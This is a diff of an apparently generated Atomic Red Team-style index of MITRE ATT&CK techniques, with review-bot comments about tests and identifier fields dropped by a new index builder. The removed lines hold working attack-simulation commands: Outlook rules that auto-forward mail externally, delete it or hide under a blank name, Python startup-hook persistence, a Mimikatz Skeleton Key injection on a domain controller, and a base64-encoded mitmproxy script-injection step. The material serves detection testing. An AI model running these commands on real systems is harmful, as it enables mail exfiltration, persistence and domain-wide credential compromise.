Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$rule = $rules.Create("#{rule_name}", 0)
$cond = $rule.Conditions.From
$cond.Enabled = $true
$cond.Recipients.Add("#{trigger_sender}")
$cond.Recipients.ResolveAll() | Out-Null
$action = $rule.Actions.DeletePermanently
$action.Enabled = $true
$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Sender-based rule '#{rule_name}' created. Emails from '#{trigger_sender}' will be permanently deleted."
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$removed = $false
for ($i = $rules.Count; $i -ge 1; $i--) {
if ($rules.Item($i).Name -eq "#{rule_name}") {
$rules.Remove($rules.Item($i).Name)
$removed = $true
}
}
if ($removed) {
$rules.Save()
Write-Host "[+] All instances of rule '#{rule_name}' removed."
} else {
Write-Host "[*] Rule '#{rule_name}' not found - already removed."
}
- name: Outlook Rule - Auto-Forward Emails to External Address via COM Object
auto_generated_guid: b0bd3d76-a57c-4699-83f4-8cd798dd09bd
description: |
Creates an Outlook rule that automatically forwards all received emails to
an external address. Simulates Business Email Compromise (BEC) and insider
threat scenarios where adversaries establish forwarding rules to exfiltrate
mail. One of the most commonly observed real-world abuses of Outlook rules.
Detected by Exchange mail flow anomalies and Microsoft Secure Score
forwarding alerts.
NOTE: No actual email is forwarded during this test - the rule is created
but a trigger email is not sent. Run cleanup immediately after verification.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
input_arguments:
rule_name:
description: Name for the forwarding rule
type: string
default: AtomicTest_T1137005_ForwardExfil
forward_to_address:
description: Email address to forward mail to (use a controlled test address)
type: string
default: atomictest-exfil@redteam.local
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$rule = $rules.Create("#{rule_name}", 0)
$action = $rule.Actions.Forward
$action.Enabled = $true
$action.Recipients.Add("#{forward_to_address}")
$action.Recipients.ResolveAll() | Out-Null
$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Auto-forward rule '#{rule_name}' created -> #{forward_to_address}"
Write-Host "[!] Run cleanup immediately after verifying rule creation in Outlook."
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$removed = $false
for ($i = $rules.Count; $i -ge 1; $i--) {
if ($rules.Item($i).Name -eq "#{rule_name}") {
$rules.Remove($rules.Item($i).Name)
$removed = $true
}
}
if ($removed) {
$rules.Save()
Write-Host "[+] All instances of forwarding rule '#{rule_name}' removed."
} else {
Write-Host "[*] Rule '#{rule_name}' not found - already removed."
}
- name: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object
auto_generated_guid: 5ff5249a-5807-480e-ab52-c430497a8a25
description: |
Enumerates all Outlook rules configured on the local profile using the
PowerShell COM object. Simulates the discovery phase where an adversary
audits existing rules before implanting their own, or where a threat actor
tool such as Ruler lists rules to understand the environment. This
enumeration should itself generate telemetry - use it to validate that
your monitoring catches PowerShell spawning Outlook COM for recon purposes.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$rules = $outlook.GetNamespace("MAPI").DefaultStore.GetRules()
Write-Host "`n[*] Enumerating Outlook rules on local profile..."
Write-Host " Total rules found: $($rules.Count)`n"
for ($i = 1; $i -le $rules.Count; $i++) {
$r = $rules.Item($i)
Write-Host " Rule $i : Name='$($r.Name)' | Enabled=$($r.Enabled)"
}
if ($rules.Count -eq 0) {
Write-Host " (No rules configured)"
}
cleanup_command: 'Write-Host "[*] No cleanup required for enumeration test."
'
- name: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)
auto_generated_guid: cb814cf8-24f2-41dc-a1cd-1c2073276d4a
description: |
Creates an Outlook rule with a zero-width space as its display name,
making it appear blank and invisible in the standard Outlook Rules UI.
Simulates the hidden inbox rule technique documented by Damian Pfammatter
(2018) and referenced in MITRE ATT&CK T1137.005 - adversaries use MAPI
editors or Ruler to blank PR_RULE_MSG_NAME so the rule does not appear
during casual rule auditing. Tests whether monitoring catches rules that
are invisible in the Outlook GUI but detectable via MFCMapi or
Get-InboxRule on Exchange. Uses PlaySound action as RunApplication
cannot be created programmatically per Microsoft's Rules object model.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
NOTE: Script is written to a temp file before execution to prevent the
ART executor's quote-wrapping from mangling the zero-width space bytes.
supported_platforms:
- windows
input_arguments:
trigger_subject:
description: Subject keyword to trigger the hidden rule
type: string
default: atomic-rt-hidden
sound_file_path:
description: Path to .wav file used as the rule action payload indicator
type: string
default: C:\Windows\Media\notify.wav
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
- description: Sound file must exist for PlaySound action
prereq_command: 'if (Test-Path "#{sound_file_path}") { exit 0 } else { exit
1 }
'
get_prereq_command: |
Write-Host "[-] Sound file not found at #{sound_file_path}"
Write-Host " Specify a valid .wav file path in the sound_file_path input argument."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$tmpScript = "$env:TEMP\T1137005_hidden_rule_create.ps1"
$lines = @(
'$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
'$outlook = New-Object -ComObject Outlook.Application',
'$namespace = $outlook.GetNamespace("MAPI")',
'$rules = $namespace.DefaultStore.GetRules()',
'$rule = $rules.Create($hiddenName, 0)',
'$cond = $rule.Conditions.Subject',
'$cond.Enabled = $true',
'$cond.Text = @("#{trigger_subject}")',
'$action = $rule.Actions.PlaySound',
'$action.Enabled = $true',
'$action.FilePath = "#{sound_file_path}"',
'$rule.Enabled = $true',
'$rules.Save()',
'Write-Host "[+] Hidden rule created with zero-width space name."',
'Write-Host "[*] Open Outlook via File -> Manage Rules and Alerts - rule name will appear blank."',
'Write-Host "[*] Verify rule exists via PowerShell COM enumeration (Test 4) or Get-InboxRule in Exchange."'
)
$lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
Remove-Item $tmpScript -ErrorAction SilentlyContinue
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$tmpScript = "$env:TEMP\T1137005_hidden_rule_cleanup.ps1"
$lines = @(
'$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
'$outlook = New-Object -ComObject Outlook.Application',
'$namespace = $outlook.GetNamespace("MAPI")',
'$rules = $namespace.DefaultStore.GetRules()',
'$removed = $false',
'for ($i = $rules.Count; $i -ge 1; $i--) {',
' if ($rules.Item($i).Name -eq $hiddenName) {',
' $rules.Remove($rules.Item($i).Name)',
' $removed = $true',
' }',
'}',
'if ($removed) {',
' $rules.Save()',
' Write-Host "[+] Hidden rule(s) removed."',
'} else {',
' Write-Host "[-] Hidden rule not found - may have already been removed."',
'}'
)
$lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
Remove-Item $tmpScript -ErrorAction SilentlyContinue
atomic_tests: []
T1098.007:
technique:
type: attack-pattern
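Review bot: four T1137.005 Outlook-rule tests (the sender-triggered `DeletePermanently` rule, the auto-forward rule `b0bd3d76-a57c-4699-83f4-8cd798dd09bd`, the rule enumeration `5ff5249a-...` and the blank-name hidden rule `cb814cf8-...`) are lost in this hunk, leaving `atomic_tests: []` just before `T1098.007:`. If the Python index builder cannot see them that is a regression in the builder, not in the tests; if they merely post-date the branch point, rebase first so the compare shows only generator differences. In neither case should a generator change remove test GUIDs from the index, so please confirm which it is before merging.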
@@ -59468,7 +58924,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
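Review bot: the parent-technique prefix is dropped from `name:` on the right-hand side of this hunk (`'Event Triggered Execution: Python Startup Hooks'` becomes `Python Startup Hooks`). The bare STIX sub-technique name is ambiguous in any rendered listing, so either keep composing `parent: sub-technique` in the new generator or make the change deliberate and consistent; the same drop recurs below for `Modify Authentication Process: Domain Controller Authentication` and `Dynamic Resolution: Domain Generation Algorithms`.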
@@ -59504,99 +58960,7 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (Windows)
auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
description: "Executes code by placing a .pth file in the site-packages directory.
\nSupports python.exe and python3.exe via input arguments.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test.
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$TempDir = Join-Path $env:TEMP "atomic_pth_win"
New-Item -ItemType Directory -Path $TempDir -Force
& "#{python_exe}" -m venv "$TempDir\env"
$SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
"import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
& "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "[+] Successfully Terminated Calculator"
- name: Python Startup Hook - usercustomize.py (Windows)
auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require Administrative privileges.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
"import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
Get-ChildItem -Path "$UserDir"
& "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
-ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
}; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
(-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
| Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
|\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
\nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
-Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
-Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
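Review bot: `identifier: T1546.018` is removed with no replacement in this hunk, in addition to the two tests (`.pth` hook `57289962-...` and `usercustomize.py` hook `05cc7a2c-...`), so the technique ID now survives only as the mapping key above `technique:`. Anything that reads `technique.identifier` from the index object rather than iterating the parent mapping will break; if the key was dropped on purpose, it needs to be called out, and if not, the generator should keep emitting it.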
@@ -60299,7 +59663,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -60329,54 +59693,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
atomic_tests: []
T1556.005:
technique:
type: attack-pattern
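Review bot: the Skeleton Key test (`0ee8081f-e9a7-4a2e-a23f-68473023184f`) disappears from T1556.001 under persistence here, and its `executor:` is the one block in this diff whose keys are ordered `command`, `cleanup_command`, `name`, `elevation_required` rather than `name` first. If the new builder validates or reads `executor` positionally instead of as a mapping, that ordering would explain the drop; check that before concluding the test is just newer than the branch. Note the test's `cleanup_command` ends in `Restart-Computer -Force`, so when it is restored its `elevation_required: true` and the isolated-DC warning must come back with it.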
@@ -62540,7 +61857,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
@@ -62567,7 +61884,6 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests: []
T1071.004:
technique:
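Review bot: only `identifier: T1568.002` is removed in this hunk, with `atomic_tests: []` unchanged on both sides, which shows the missing `identifier` key is the generator's output format and not a stale-base artifact. Emit the key (its value is the same as the `T1568.002:` map key above) so each technique record stays self-describing when consumers iterate over technique objects rather than the parent mapping.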
@@ -63532,66 +62848,7 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection (Windows)
auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c
description: Start mitmdump proxy with injection script in the background.
supported_platforms:
- windows
dependencies:
- description: Python must be installed
prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
0 } else { exit 1 }
'
get_prereq_command: 'winget install --id Python.Python.3 -e
'
- description: curl must be installed
prereq_command: 'if (Get-Command curl.exe -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'winget install --id cURL.cURL -e
'
- description: mitmproxy must be installed and in PATH
prereq_command: 'if (Get-Command mitmdump -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'python -m pip install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue
| Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name
-like "*mitmdump*" }) { exit 0 } else { exit 1 }
'
get_prereq_command: |
$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
Start-Sleep -Seconds 5
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
executor:
name: powershell
elevation_required: false
command: |
curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
$OutPath = "$env:TEMP\atomic_t1659_page.html"
curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
$Content = Get-Content -Path $OutPath -Raw
if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
cleanup_command: |
Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
atomic_tests: []
T1205:
technique:
type: attack-pattern
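Review bot: T1659 loses both its `identifier: T1659` line and its only test (`dcc2ca85-a21c-43a4-acc7-7314d4e5891c`) in this hunk, leaving `atomic_tests: []`. This test differs structurally from the surviving ones in having four `dependencies:` entries, the last of which starts `mitmdump` in the background from a multi-line `get_prereq_command` carrying a base64 payload; confirm the loader handles a multi-entry dependency list with `|` block scalars before assuming the test is merely newer than the branch.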
@@ -67667,6 +66924,7 @@ collection:
auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
description: |
Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
[Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
supported_platforms:
- windows
@@ -67708,45 +66966,6 @@ collection:
'
name: powershell
elevation_required: true
- name: RDP Bitmap Cache Extraction via bmc-tools
auto_generated_guid: 98f19852-7348-4f99-9e15-6ff4320464c7
description: |
Simulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script.
This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).
supported_platforms:
- windows
input_arguments:
cache_path:
description: Path to the RDP Cache directory or specific .bmc file
type: path
default: "$env:LOCALAPPDATA\\Microsoft\\Terminal Server Client\\Cache"
output_dir:
description: Directory to save reconstructed images
type: path
default: "$env:TEMP\\rdp_screens"
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and in the PATH to run bmc-tools.py
'
prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "Please install Python manually."
'
executor:
name: powershell
elevation_required: false
command: "$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'\n$toolsDir
= \"$env:TEMP\\bmc-tools.py\"\n \n# create output directory\nNew-Item -ItemType
Directory -Path #{output_dir} -Force | Out-Null\n\n# python script download\n&
curl.exe -L $url --output $toolsDir\n \n# execution step\nif (Test-Path
$toolsDir) { python $toolsDir -s \"#{cache_path}\" -d #{output_dir} -b }\n"
cleanup_command: |
Remove-Item "$env:TEMP\bmc-tools.py" -ErrorAction SilentlyContinue
Remove-Item #{output_dir} -Recurse -Force -ErrorAction SilentlyContinue
T1557:
technique:
type: attack-pattern
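Review bot: unlike the earlier hunks, a test is dropped from the middle of a non-empty list here: `RDP Bitmap Cache Extraction via bmc-tools` (`98f19852-7348-4f99-9e15-6ff4320464c7`) disappears while the CopyFromScreen test above it survives, so the loss is per-test, not per-technique. Its `command:` is also the one serialized as a double-quoted scalar with literal `\n` escapes (`$url = '...'\n$toolsDir = ...`) rather than a `|` block; if the builder's filtering trips on that quoting, look there, and when the test is restored prefer a block scalar so the command is readable in the index.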
@@ -80363,7 +79582,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -80393,54 +79612,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
atomic_tests: []
T1556.005:
technique:
type: attack-pattern
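Review bot: the same Skeleton Key test and `identifier: T1556.001` line are removed from the credential-access copy of the record here as from the persistence copy above. Whatever fix lands (rebase or builder change) must regenerate both tactic sections together; a partial regeneration would leave the two copies of one technique disagreeing, which the index has never done before.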
@@ -80921,62 +80093,6 @@ credential-access:
diskshadow.exe /s #(unknown)
name: command_prompt
elevation_required: true
- name: Copy NTDS in low level NTFS acquisition via MFT parsing
auto_generated_guid: f57cb283-c131-4e2f-8a6c-363d575748b2
description: |
This test is intended to be run on a domain Controller.
